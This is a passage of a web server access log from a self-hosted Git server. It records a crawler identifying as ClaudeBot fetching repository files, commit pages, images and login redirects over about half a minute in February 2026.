"/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10840] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 216.73.216.188] [Length 11024] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64?display=source" [Client 216.73.216.188] [Length 11057] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html?display=rendered" [Client 216.73.216.188] [Length 10932] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" [Client 216.73.216.188] [Length 10802] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 844] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom6.png" -[15/Feb/2026:13:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fpages%2FDCS.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 216.73.216.188] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11665] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 216.73.216.188] [Length 11020] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" [Client 216.73.216.188] [Length 10133] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 12155] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js?display=source" [Client 216.73.216.188] [Length 24145] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 216.73.216.188] [Length 13535] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf?display=rendered" [Client 216.73.216.188] [Length 10883] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 216.73.216.188] [Length 12171] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 216.73.216.188] [Length 10991] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" [Client 216.73.216.188] [Length 10074] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" [Client 216.73.216.188] [Length 10828] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" [Client 216.73.216.188] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 216.73.216.188] [Length 10992] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 216.73.216.188] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 216.73.216.188] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.bundle" [Client 216.73.216.188] [Length 15540674] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 216.73.216.188] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2Fproject.assets.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 216.73.216.188] [Length 11009] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 216.73.216.188] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 216.73.216.188] [Length 11020] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 9939] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnginx.conf" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 